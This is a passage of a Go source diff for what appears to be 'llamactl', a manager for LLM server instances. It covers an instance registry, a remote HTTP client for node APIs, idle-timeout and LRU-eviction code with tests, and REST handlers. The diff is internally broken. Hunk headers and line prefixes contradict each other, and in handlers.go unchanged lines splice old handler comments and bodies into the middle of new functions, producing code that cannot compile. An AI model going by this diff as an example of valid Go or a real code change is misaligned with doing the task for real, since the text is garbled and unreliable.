 	return fmt.Errorf("instance %s not found", name)
 }
 // markRunning records name in the running set. It does not take r.mu and does
 // not check whether name is registered.
 func (r *instanceRegistry) markRunning(name string) {
 	r.running.Store(name, struct{}{})
 }
 // markStopped removes name from the running set. It does not take r.mu and
 // does not check whether name is registered.
 func (r *instanceRegistry) markStopped(name string) {
 	r.running.Delete(name)
 }
 // isRunning reports whether name is currently in the running set.
 // It does not take r.mu.
 func (r *instanceRegistry) isRunning(name string) bool {
 	_, marked := r.running.Load(name)
 	return marked
 }
 // count returns how many instances are registered, running or not.
 func (r *instanceRegistry) count() int {
 	r.mu.RLock()
 	total := len(r.instances)
 	r.mu.RUnlock()
 	return total
 }
--- a/pkg/manager/remote.go
+++ b/pkg/manager/remote.go
@@ -0,0 +1,293 @@
 package manager
 import (
 	"bytes"
 	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"net/http"
 	"net/url"
 	"sync"
 	"time"
 )
 // apiBasePath is the URL path prefix (with trailing slash) to which the remote
 // operations in this file append the escaped instance name.
 const apiBasePath = "/api/v1/instances/"
 // remoteManager handles HTTP operations for remote instances and keeps track
 // of which node each remote instance is mapped to.
 type remoteManager struct {
 	mu             sync.RWMutex                  // guards instanceToNode; also held while setInstanceNode reads nodeMap
 	client         *http.Client                  // shared client; its Timeout is set in newRemoteManager
 	nodeMap        map[string]*config.NodeConfig // node name -> node config
 	instanceToNode map[string]*config.NodeConfig // instance name -> node config
 }
 // newRemoteManager builds a remote manager for the given nodes.
 // Each node config is copied, so later changes to the caller's map do not
 // affect the manager. A non-positive timeout is replaced by 30 seconds; the
 // value is used as the HTTP client timeout.
 func newRemoteManager(nodes map[string]config.NodeConfig, timeout time.Duration) *remoteManager {
 	const fallbackTimeout = 30 * time.Second
 	if timeout <= 0 {
 		timeout = fallbackTimeout
 	}
 	byName := make(map[string]*config.NodeConfig, len(nodes))
 	for name, cfg := range nodes {
 		cfg := cfg // take a per-node copy before storing its address
 		byName[name] = &cfg
 	}
 	httpClient := &http.Client{Timeout: timeout}
 	return &remoteManager{
 		client:         httpClient,
 		nodeMap:        byName,
 		instanceToNode: map[string]*config.NodeConfig{},
 	}
 }
 // getNodeForInstance returns the node config that instanceName is mapped to.
 // The boolean is false, and the config nil, when no mapping exists.
 func (rm *remoteManager) getNodeForInstance(instanceName string) (*config.NodeConfig, bool) {
 	rm.mu.RLock()
 	mapped, ok := rm.instanceToNode[instanceName]
 	rm.mu.RUnlock()
 	return mapped, ok
 }
 // setInstanceNode maps instanceName to the node called nodeName, replacing
 // any earlier mapping. It fails when nodeName is not a known node.
 func (rm *remoteManager) setInstanceNode(instanceName, nodeName string) error {
 	rm.mu.Lock()
 	defer rm.mu.Unlock()
 	if target, known := rm.nodeMap[nodeName]; known {
 		rm.instanceToNode[instanceName] = target
 		return nil
 	}
 	return fmt.Errorf("node %s not found", nodeName)
 }
 // removeInstance forgets which node instanceName is mapped to. Removing a
 // name that has no mapping is a no-op.
 func (rm *remoteManager) removeInstance(instanceName string) {
 	rm.mu.Lock()
 	delete(rm.instanceToNode, instanceName)
 	rm.mu.Unlock()
 }
 // --- HTTP request helpers ---
 // makeRemoteRequest sends an HTTP request to nodeConfig.Address + path and
 // returns the raw response; the caller is responsible for closing its body.
 // A non-nil body is JSON-encoded and sent with a JSON Content-Type header.
 // When the node has an API key, it is sent as a Bearer token.
 func (rm *remoteManager) makeRemoteRequest(ctx context.Context, nodeConfig *config.NodeConfig, method, path string, body any) (*http.Response, error) {
 	hasBody := body != nil
 	// payload stays a nil interface when there is nothing to send.
 	var payload io.Reader
 	if hasBody {
 		encoded, err := json.Marshal(body)
 		if err != nil {
 			return nil, fmt.Errorf("failed to marshal request body: %w", err)
 		}
 		payload = bytes.NewBuffer(encoded)
 	}
 	endpoint := fmt.Sprintf("%s%s", nodeConfig.Address, path)
 	request, err := http.NewRequestWithContext(ctx, method, endpoint, payload)
 	if err != nil {
 		return nil, fmt.Errorf("failed to create request: %w", err)
 	}
 	if hasBody {
 		request.Header.Set("Content-Type", "application/json")
 	}
 	if key := nodeConfig.APIKey; key != "" {
 		request.Header.Set("Authorization", fmt.Sprintf("Bearer %s", key))
 	}
 	response, err := rm.client.Do(request)
 	if err != nil {
 		return nil, fmt.Errorf("failed to execute request: %w", err)
 	}
 	return response, nil
 }
 // parseRemoteResponse parses an HTTP response and unmarshals the result.
 func parseRemoteResponse(resp *http.Response, result any) error {
 	defer resp.Body.Close()
 	body, err := io.ReadAll(resp.Body)
 	if err != nil {
 		return fmt.Errorf("failed to read response body: %w", err)
 	}
 	if resp.StatusCode < 200 || resp.StatusCode >= 300 {
 		return fmt.Errorf("API request failed with status %d: %s", resp.StatusCode, string(body))
 	}
 	if result != nil {
 		if err := json.Unmarshal(body, result); err != nil {
 			return fmt.Errorf("failed to unmarshal response: %w", err)
 		}
 	}
 	return nil
 }
 // --- Remote CRUD operations ---
 // createInstance POSTs opts to the instance endpoint for name on the given
 // node and returns the instance decoded from the response.
 func (rm *remoteManager) createInstance(ctx context.Context, node *config.NodeConfig, name string, opts *instance.Options) (*instance.Instance, error) {
 	endpoint := fmt.Sprintf("%s%s/", apiBasePath, url.PathEscape(name))
 	resp, err := rm.makeRemoteRequest(ctx, node, "POST", endpoint, opts)
 	if err != nil {
 		return nil, err
 	}
 	created := new(instance.Instance)
 	if err = parseRemoteResponse(resp, created); err != nil {
 		return nil, err
 	}
 	return created, nil
 }
 // getInstance GETs the instance endpoint for name on the given node and
 // returns the instance decoded from the response.
 func (rm *remoteManager) getInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
 	endpoint := fmt.Sprintf("%s%s/", apiBasePath, url.PathEscape(name))
 	resp, err := rm.makeRemoteRequest(ctx, node, "GET", endpoint, nil)
 	if err != nil {
 		return nil, err
 	}
 	fetched := new(instance.Instance)
 	if err = parseRemoteResponse(resp, fetched); err != nil {
 		return nil, err
 	}
 	return fetched, nil
 }
 // updateInstance PUTs opts to the instance endpoint for name on the given
 // node and returns the instance decoded from the response.
 func (rm *remoteManager) updateInstance(ctx context.Context, node *config.NodeConfig, name string, opts *instance.Options) (*instance.Instance, error) {
 	endpoint := fmt.Sprintf("%s%s/", apiBasePath, url.PathEscape(name))
 	resp, err := rm.makeRemoteRequest(ctx, node, "PUT", endpoint, opts)
 	if err != nil {
 		return nil, err
 	}
 	changed := new(instance.Instance)
 	if err = parseRemoteResponse(resp, changed); err != nil {
 		return nil, err
 	}
 	return changed, nil
 }
 // deleteInstance sends DELETE to the instance endpoint for name on the given
 // node. The response body is not decoded; only the status code decides
 // whether an error is returned.
 func (rm *remoteManager) deleteInstance(ctx context.Context, node *config.NodeConfig, name string) error {
 	endpoint := fmt.Sprintf("%s%s/", apiBasePath, url.PathEscape(name))
 	resp, reqErr := rm.makeRemoteRequest(ctx, node, "DELETE", endpoint, nil)
 	if reqErr == nil {
 		return parseRemoteResponse(resp, nil)
 	}
 	return reqErr
 }
 // startInstance POSTs to the "start" endpoint for name on the given node and
 // returns the instance decoded from the response.
 func (rm *remoteManager) startInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
 	endpoint := fmt.Sprintf("%s%s/start", apiBasePath, url.PathEscape(name))
 	resp, err := rm.makeRemoteRequest(ctx, node, "POST", endpoint, nil)
 	if err != nil {
 		return nil, err
 	}
 	started := new(instance.Instance)
 	if err = parseRemoteResponse(resp, started); err != nil {
 		return nil, err
 	}
 	return started, nil
 }
 // stopInstance POSTs to the "stop" endpoint for name on the given node and
 // returns the instance decoded from the response.
 func (rm *remoteManager) stopInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
 	endpoint := fmt.Sprintf("%s%s/stop", apiBasePath, url.PathEscape(name))
 	resp, err := rm.makeRemoteRequest(ctx, node, "POST", endpoint, nil)
 	if err != nil {
 		return nil, err
 	}
 	stopped := new(instance.Instance)
 	if err = parseRemoteResponse(resp, stopped); err != nil {
 		return nil, err
 	}
 	return stopped, nil
 }
 // restartInstance POSTs to the "restart" endpoint for name on the given node
 // and returns the instance decoded from the response.
 func (rm *remoteManager) restartInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
 	endpoint := fmt.Sprintf("%s%s/restart", apiBasePath, url.PathEscape(name))
 	resp, err := rm.makeRemoteRequest(ctx, node, "POST", endpoint, nil)
 	if err != nil {
 		return nil, err
 	}
 	restarted := new(instance.Instance)
 	if err = parseRemoteResponse(resp, restarted); err != nil {
 		return nil, err
 	}
 	return restarted, nil
 }
 // getInstanceLogs GETs the "logs" endpoint for name on the given node,
 // passing numLines as the "lines" query parameter, and returns the response
 // body verbatim as a string. A status outside 200-299 becomes an error that
 // includes the status code and the body text.
 func (rm *remoteManager) getInstanceLogs(ctx context.Context, node *config.NodeConfig, name string, numLines int) (string, error) {
 	endpoint := fmt.Sprintf("%s%s/logs?lines=%d", apiBasePath, url.PathEscape(name), numLines)
 	resp, err := rm.makeRemoteRequest(ctx, node, "GET", endpoint, nil)
 	if err != nil {
 		return "", err
 	}
 	defer resp.Body.Close()
 	raw, err := io.ReadAll(resp.Body)
 	if err != nil {
 		return "", fmt.Errorf("failed to read response body: %w", err)
 	}
 	if success := resp.StatusCode >= 200 && resp.StatusCode < 300; !success {
 		return "", fmt.Errorf("API request failed with status %d: %s", resp.StatusCode, string(raw))
 	}
 	// The body is treated as plain text, not JSON.
 	return string(raw), nil
 }
--- a/pkg/manager/timeout.go
+++ b/pkg/manager/timeout.go
@@ -1,64 +0,0 @@
 package manager
 import (
 	"fmt"
 	"llamactl/pkg/instance"
 	"log"
 )
 // checkAllTimeouts stops every instance whose ShouldTimeout reports true.
 // Names are collected under the read lock, and the lock is released before
 // StopInstance is called. Each stop attempt and its outcome is logged.
 func (im *instanceManager) checkAllTimeouts() {
 	var expired []string
 	im.mu.RLock()
 	for _, candidate := range im.instances {
 		if !candidate.ShouldTimeout() {
 			continue
 		}
 		expired = append(expired, candidate.Name)
 	}
 	im.mu.RUnlock() // must not be held while StopInstance runs
 	for _, name := range expired {
 		log.Printf("Instance %s has timed out, stopping it", name)
 		_, stopErr := im.StopInstance(name)
 		if stopErr == nil {
 			log.Printf("Instance %s stopped successfully", name)
 			continue
 		}
 		log.Printf("Error stopping instance %s: %v", name, stopErr)
 	}
 }
 // EvictLRUInstance stops the running instance with the smallest
 // LastRequestTime. Instances whose IdleTimeout option is set to a value <= 0
 // are never picked. Returns an error when no candidate exists, or the error
 // from StopInstance.
 func (im *instanceManager) EvictLRUInstance() error {
 	var oldest *instance.Process
 	im.mu.RLock()
 	for name := range im.runningInstances {
 		candidate := im.instances[name]
 		if candidate == nil {
 			continue
 		}
 		// An explicit non-positive idle timeout exempts the instance.
 		if opts := candidate.GetOptions(); opts != nil && opts.IdleTimeout != nil && *opts.IdleTimeout <= 0 {
 			continue
 		}
 		if oldest == nil || candidate.LastRequestTime() < oldest.LastRequestTime() {
 			oldest = candidate
 		}
 	}
 	im.mu.RUnlock()
 	if oldest == nil {
 		return fmt.Errorf("failed to find lru instance")
 	}
 	_, stopErr := im.StopInstance(oldest.Name)
 	return stopErr
 }
--- a/pkg/manager/timeout_test.go
+++ b/pkg/manager/timeout_test.go
@@ -1,332 +0,0 @@
 package manager_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
 	"sync"
 	"testing"
 	"time"
 )
 func TestTimeoutFunctionality(t *testing.T) {
 	// Test timeout checker initialization
 	backendConfig := config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	cfg := config.InstancesConfig{
 		PortRange:            [2]int{8000, 9000},
 		TimeoutCheckInterval: 10,
 		MaxInstances:         5,
 	}
 	manager := manager.NewInstanceManager(backendConfig, cfg)
 	if manager == nil {
 		t.Fatal("Manager should be initialized with timeout checker")
 	}
 	manager.Shutdown() // Clean up
 	// Test timeout configuration and logic without starting the actual process
 	testManager := createTestManager()
 	defer testManager.Shutdown()
 	idleTimeout := 1 // 1 minute
 	options := &instance.CreateInstanceOptions{
 		IdleTimeout: &idleTimeout,
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
 	inst, err := testManager.CreateInstance("timeout-test", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	// Test timeout configuration is properly set
 	if inst.GetOptions().IdleTimeout == nil {
 		t.Fatal("Instance should have idle timeout configured")
 	}
 	if *inst.GetOptions().IdleTimeout != 1 {
 		t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
 	}
 	// Test timeout logic without actually starting the process
 	// Create a mock time provider to simulate timeout
 	mockTime := NewMockTimeProvider(time.Now())
 	inst.SetTimeProvider(mockTime)
 	// Set instance to running state so timeout logic can work
 	inst.SetStatus(instance.Running)
 	// Simulate instance being "running" for timeout check (without actual process)
 	// We'll test the ShouldTimeout logic directly
 	inst.UpdateLastRequestTime()
 	// Initially should not timeout (just updated)
 	if inst.ShouldTimeout() {
 		t.Error("Instance should not timeout immediately after request")
 	}
 	// Advance time to trigger timeout
 	mockTime.SetTime(time.Now().Add(2 * time.Minute))
 	// Now it should timeout
 	if !inst.ShouldTimeout() {
 		t.Error("Instance should timeout after idle period")
 	}
 	// Reset running state to avoid shutdown issues
 	inst.SetStatus(instance.Stopped)
 	// Test that instance without timeout doesn't timeout
 	noTimeoutOptions := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 		// No IdleTimeout set
 	}
 	noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	noTimeoutInst.SetTimeProvider(mockTime)
 	noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
 	noTimeoutInst.UpdateLastRequestTime()
 	// Even with time advanced, should not timeout
 	if noTimeoutInst.ShouldTimeout() {
 		t.Error("Instance without timeout configuration should never timeout")
 	}
 	// Reset running state to avoid shutdown issues
 	noTimeoutInst.SetStatus(instance.Stopped)
 }
 // TestEvictLRUInstance_Success creates three running instances with distinct
 // last-request times and verifies that EvictLRUInstance stops only the one
 // whose last request is the oldest.
 func TestEvictLRUInstance_Success(t *testing.T) {
 	manager := createTestManager()
 	// Shutdown is not deferred: instances are first reset to Stopped at the
 	// end of the test and the manager is shut down afterwards.
 	// newEvictable creates an instance with idle timeout enabled; the value
 	// itself does not matter for the LRU logic as long as it is > 0.
 	newEvictable := func(name, model string) *instance.Process {
 		timeout := 1
 		inst, err := manager.CreateInstance(name, &instance.CreateInstanceOptions{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &llamacpp.LlamaServerOptions{
 				Model: model,
 			},
 			IdleTimeout: &timeout,
 		})
 		if err != nil {
 			t.Fatalf("CreateInstance failed: %v", err)
 		}
 		return inst
 	}
 	inst1 := newEvictable("instance-1", "/path/to/model1.gguf")
 	inst2 := newEvictable("instance-2", "/path/to/model2.gguf")
 	inst3 := newEvictable("instance-3", "/path/to/model3.gguf")
 	// Set up mock time and set instances to running
 	mockTime := NewMockTimeProvider(time.Now())
 	all := []*instance.Process{inst1, inst2, inst3}
 	for _, inst := range all {
 		inst.SetTimeProvider(mockTime)
 	}
 	for _, inst := range all {
 		inst.SetStatus(instance.Running)
 	}
 	// Set different last request times (oldest to newest)
 	// inst1: oldest (will be evicted)
 	inst1.UpdateLastRequestTime()
 	mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
 	inst2.UpdateLastRequestTime()
 	mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
 	inst3.UpdateLastRequestTime()
 	// Evict LRU instance (should be inst1)
 	if err := manager.EvictLRUInstance(); err != nil {
 		t.Fatalf("EvictLRUInstance failed: %v", err)
 	}
 	// Verify inst1 is stopped
 	if inst1.IsRunning() {
 		t.Error("Expected instance-1 to be stopped after eviction")
 	}
 	// Verify inst2 and inst3 are still running
 	if !inst2.IsRunning() {
 		t.Error("Expected instance-2 to still be running")
 	}
 	if !inst3.IsRunning() {
 		t.Error("Expected instance-3 to still be running")
 	}
 	// Clean up manually - set all to stopped and then shutdown. The shutdown
 	// call was previously missing, so the manager was never released.
 	inst2.SetStatus(instance.Stopped)
 	inst3.SetStatus(instance.Stopped)
 	manager.Shutdown()
 }
 // TestEvictLRUInstance_NoEligibleInstances verifies that EvictLRUInstance
 // fails with "failed to find lru instance" when nothing can be evicted, and
 // that with a mix of instances only the one with idle timeout enabled is
 // stopped.
 func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
 	// Helper function to create instances with different timeout configurations.
 	// It takes the calling (sub)test's *testing.T so that Fatalf is invoked on
 	// the goroutine that is actually running that test.
 	createInstanceWithTimeout := func(t *testing.T, mgr manager.InstanceManager, name, model string, timeout *int) *instance.Process {
 		t.Helper()
 		options := &instance.CreateInstanceOptions{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &llamacpp.LlamaServerOptions{
 				Model: model,
 			},
 			IdleTimeout: timeout,
 		}
 		inst, err := mgr.CreateInstance(name, options)
 		if err != nil {
 			t.Fatalf("CreateInstance failed: %v", err)
 		}
 		return inst
 	}
 	t.Run("no running instances", func(t *testing.T) {
 		manager := createTestManager()
 		defer manager.Shutdown()
 		err := manager.EvictLRUInstance()
 		// Fatal, not Error: the message check below dereferences err.
 		if err == nil {
 			t.Fatal("Expected error when no running instances exist")
 		}
 		if err.Error() != "failed to find lru instance" {
 			t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
 		}
 	})
 	t.Run("only instances without timeout", func(t *testing.T) {
 		manager := createTestManager()
 		defer manager.Shutdown()
 		// Create instances with various non-eligible timeout configurations
 		zeroTimeout := 0
 		negativeTimeout := -1
 		inst1 := createInstanceWithTimeout(t, manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
 		inst2 := createInstanceWithTimeout(t, manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
 		inst3 := createInstanceWithTimeout(t, manager, "no-timeout-3", "/path/to/model3.gguf", nil)
 		// Set instances to running
 		instances := []*instance.Process{inst1, inst2, inst3}
 		for _, inst := range instances {
 			inst.SetStatus(instance.Running)
 		}
 		defer func() {
 			// Reset instances to stopped to avoid shutdown panics
 			for _, inst := range instances {
 				inst.SetStatus(instance.Stopped)
 			}
 		}()
 		// Try to evict - should fail because no eligible instances
 		err := manager.EvictLRUInstance()
 		// Fatal, not Error: the message check below dereferences err. The
 		// deferred cleanup above still runs.
 		if err == nil {
 			t.Fatal("Expected error when no eligible instances exist")
 		}
 		if err.Error() != "failed to find lru instance" {
 			t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
 		}
 		// Verify all instances are still running
 		for i, inst := range instances {
 			if !inst.IsRunning() {
 				t.Errorf("Expected instance %d to still be running", i+1)
 			}
 		}
 	})
 	t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
 		manager := createTestManager()
 		defer manager.Shutdown()
 		// Create mix of instances: some with timeout enabled, some disabled
 		validTimeout := 1
 		zeroTimeout := 0
 		instWithTimeout := createInstanceWithTimeout(t, manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
 		instNoTimeout1 := createInstanceWithTimeout(t, manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
 		instNoTimeout2 := createInstanceWithTimeout(t, manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
 		// Set all instances to running
 		instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
 		for _, inst := range instances {
 			inst.SetStatus(instance.Running)
 			inst.UpdateLastRequestTime()
 		}
 		defer func() {
 			// Reset instances to stopped to avoid shutdown panics
 			for _, inst := range instances {
 				if inst.IsRunning() {
 					inst.SetStatus(instance.Stopped)
 				}
 			}
 		}()
 		// Evict LRU instance - should only consider the one with timeout
 		err := manager.EvictLRUInstance()
 		if err != nil {
 			t.Fatalf("EvictLRUInstance failed: %v", err)
 		}
 		// Verify only the instance with timeout was evicted
 		if instWithTimeout.IsRunning() {
 			t.Error("Expected with-timeout instance to be stopped after eviction")
 		}
 		if !instNoTimeout1.IsRunning() {
 			t.Error("Expected no-timeout-1 instance to still be running")
 		}
 		if !instNoTimeout2.IsRunning() {
 			t.Error("Expected no-timeout-2 instance to still be running")
 		}
 	})
 }
 // Helper for timeout tests
 type MockTimeProvider struct {
 	currentTime time.Time
 	mu          sync.RWMutex
 }
 func NewMockTimeProvider(t time.Time) *MockTimeProvider {
 	return &MockTimeProvider{currentTime: t}
 }
 func (m *MockTimeProvider) Now() time.Time {
 	m.mu.RLock()
 	defer m.mu.RUnlock()
 	return m.currentTime
 }
 func (m *MockTimeProvider) SetTime(t time.Time) {
 	m.mu.Lock()
 	defer m.mu.Unlock()
 	m.currentTime = t
 }
--- a/pkg/server/handlers.go
+++ b/pkg/server/handlers.go
@@ -1,795 +1,115 @@
 package server
 import (
 	"bytes"
 	"encoding/json"
 	"fmt"
 	"io"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/backends/mlx"
 	"llamactl/pkg/backends/vllm"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
 	"llamactl/pkg/validation"
 	"log"
 	"net/http"
-	"os/exec"
+	"time"
 	"strconv"
 	"strings"
 	"github.com/go-chi/chi/v5"
 )
 // errorResponse represents an error response returned by the API.
 // It is the JSON payload that writeError encodes into the response body.
 type errorResponse struct {
 	// Error is serialized under the "error" key; writeError fills it from its code argument.
 	Error   string `json:"error"`
 	// Details is serialized under the "details" key and omitted from the JSON when empty.
 	Details string `json:"details,omitempty"`
 }
 // writeError sends an errorResponse built from code and details as JSON,
 // using status as the HTTP status code. An encoding failure is only logged.
 func writeError(w http.ResponseWriter, status int, code, details string) {
 	payload := errorResponse{Error: code, Details: details}
 	w.Header().Set("Content-Type", "application/json")
 	w.WriteHeader(status)
 	encodeErr := json.NewEncoder(w).Encode(payload)
 	if encodeErr == nil {
 		return
 	}
 	log.Printf("Failed to encode error response: %v", encodeErr)
 }
 // writeJSON writes a JSON response with the specified HTTP status code
 func writeJSON(w http.ResponseWriter, status int, data any) {
 	w.Header().Set("Content-Type", "application/json")
 	w.WriteHeader(status)
 	if err := json.NewEncoder(w).Encode(data); err != nil {
 		log.Printf("Failed to encode JSON response: %v", err)
 	}
 }
 // writeText writes a plain text response with the specified HTTP status code
 func writeText(w http.ResponseWriter, status int, data string) {
 	w.Header().Set("Content-Type", "text/plain")
 	w.WriteHeader(status)
 	if _, err := w.Write([]byte(data)); err != nil {
 		log.Printf("Failed to write text response: %v", err)
 	}
 }
 // Handler provides HTTP handlers for the llamactl server API.
 // Instances are created with NewHandler.
 type Handler struct {
 	// InstanceManager is the backend the handlers call to list, create, fetch,
 	// update, start, stop, restart, delete and evict instances.
 	InstanceManager manager.InstanceManager
 	// cfg is the application configuration passed to NewHandler.
 	cfg             config.AppConfig
 	// httpClient is built by NewHandler with a 30 second timeout.
 	// NOTE(review): its callers are not visible in this part of the file.
 	httpClient      *http.Client
 }
 // NewHandler builds a Handler around the given instance manager and
 // application configuration, together with an HTTP client whose timeout is
 // 30 seconds.
 func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
 	client := &http.Client{Timeout: 30 * time.Second}
 	handler := &Handler{
 		InstanceManager: im,
 		cfg:             cfg,
 		httpClient:      client,
 	}
 	return handler
 }
-// VersionHandler godoc
+// getInstance retrieves an instance by name from the request query parameters
-// @Summary Get llamactl version
+func (h *Handler) getInstance(r *http.Request) (*instance.Instance, error) {
-// @Description Returns the version of the llamactl command
+	name := chi.URLParam(r, "name")
-// @Tags version
+	validatedName, err := validation.ValidateInstanceName(name)
-// @Security ApiKeyAuth
+	if err != nil {
-// @Produces text/plain
+		return nil, fmt.Errorf("invalid instance name: %w", err)
 // @Success 200 {string} string "Version information"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /version [get]
 func (h *Handler) VersionHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		w.Header().Set("Content-Type", "text/plain")
 		fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
 	}
 	inst, err := h.InstanceManager.GetInstance(validatedName)
 	if err != nil {
 		return nil, fmt.Errorf("failed to get instance by name: %w", err)
 	}
 	return inst, nil
 }
-// LlamaServerHelpHandler godoc
+// ensureInstanceRunning ensures the instance is running by starting it if on-demand start is enabled
-// @Summary Get help for llama server
+// It handles LRU eviction when the maximum number of running instances is reached
-// @Description Returns the help text for the llama server command
+func (h *Handler) ensureInstanceRunning(inst *instance.Instance) error {
-// @Tags backends
+	options := inst.GetOptions()
-// @Security ApiKeyAuth
+	allowOnDemand := options != nil && options.OnDemandStart != nil && *options.OnDemandStart
-// @Produces text/plain
+	if !allowOnDemand {
-// @Success 200 {string} string "Help text"
+		return fmt.Errorf("instance is not running and on-demand start is not enabled")
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /backends/llama-cpp/help [get]
 func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Run "llama-server --help" and capture stdout and stderr together.
 		helpText, runErr := exec.Command("llama-server", "--help").CombinedOutput()
 		if runErr != nil {
 			http.Error(w, "Failed to get help: "+runErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "text/plain")
 		w.Write(helpText)
 	}
 }
-// LlamaServerVersionHandler godoc
+	if h.InstanceManager.IsMaxRunningInstancesReached() {
-// @Summary Get version of llama server
+		if h.cfg.Instances.EnableLRUEviction {
-// @Description Returns the version of the llama server command
+			err := h.InstanceManager.EvictLRUInstance()
-// @Tags backends
+			if err != nil {
-// @Security ApiKeyAuth
+				return fmt.Errorf("cannot start instance, failed to evict instance: %w", err)
 // @Produces text/plain
 // @Success 200 {string} string "Version information"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /backends/llama-cpp/version [get]
 func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Run "llama-server --version" and capture stdout and stderr together.
 		versionText, runErr := exec.Command("llama-server", "--version").CombinedOutput()
 		if runErr != nil {
 			http.Error(w, "Failed to get version: "+runErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "text/plain")
 		w.Write(versionText)
 	}
 }
 // LlamaServerListDevicesHandler godoc
 // @Summary List available devices for llama server
 // @Description Returns a list of available devices for the llama server
 // @Tags backends
 // @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "List of devices"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /backends/llama-cpp/devices [get]
 func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		// Run "llama-server --list-devices" and capture stdout and stderr together.
 		devices, runErr := exec.Command("llama-server", "--list-devices").CombinedOutput()
 		if runErr != nil {
 			http.Error(w, "Failed to list devices: "+runErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "text/plain")
 		w.Write(devices)
 	}
 }
 // ListInstances godoc
 // @Summary List all instances
 // @Description Returns a list of all instances managed by the server
 // @Tags instances
 // @Security ApiKeyAuth
 // @Produces json
 // @Success 200 {array} instance.Process "List of instances"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances [get]
 func (h *Handler) ListInstances() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		all, listErr := h.InstanceManager.ListInstances()
 		if listErr != nil {
 			http.Error(w, "Failed to list instances: "+listErr.Error(), http.StatusInternalServerError)
 			return
 		}
 		// Stream the list straight into the response as JSON.
 		w.Header().Set("Content-Type", "application/json")
 		encodeErr := json.NewEncoder(w).Encode(all)
 		if encodeErr != nil {
 			http.Error(w, "Failed to encode instances: "+encodeErr.Error(), http.StatusInternalServerError)
 		}
 	}
 }
 // CreateInstance godoc
 // @Summary Create and start a new instance
 // @Description Creates a new instance with the provided configuration options
 // @Tags instances
 // @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
 // @Param options body instance.CreateInstanceOptions true "Instance configuration options"
 // @Success 201 {object} instance.Process "Created instance details"
 // @Failure 400 {string} string "Invalid request body"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [post]
 func (h *Handler) CreateInstance() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		name := chi.URLParam(r, "name")
 		if name == "" {
 			http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
 			return
 		}
 		var options instance.CreateInstanceOptions
 		if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
 			http.Error(w, "Invalid request body", http.StatusBadRequest)
 			return
 		}
 		inst, err := h.InstanceManager.CreateInstance(name, &options)
 		if err != nil {
 			http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		// Encode into a buffer before touching the response: once the 201
 		// status has been written it cannot be replaced, so an encoding
 		// failure has to be detected while a 500 can still be sent.
 		var payload bytes.Buffer
 		if err := json.NewEncoder(&payload).Encode(inst); err != nil {
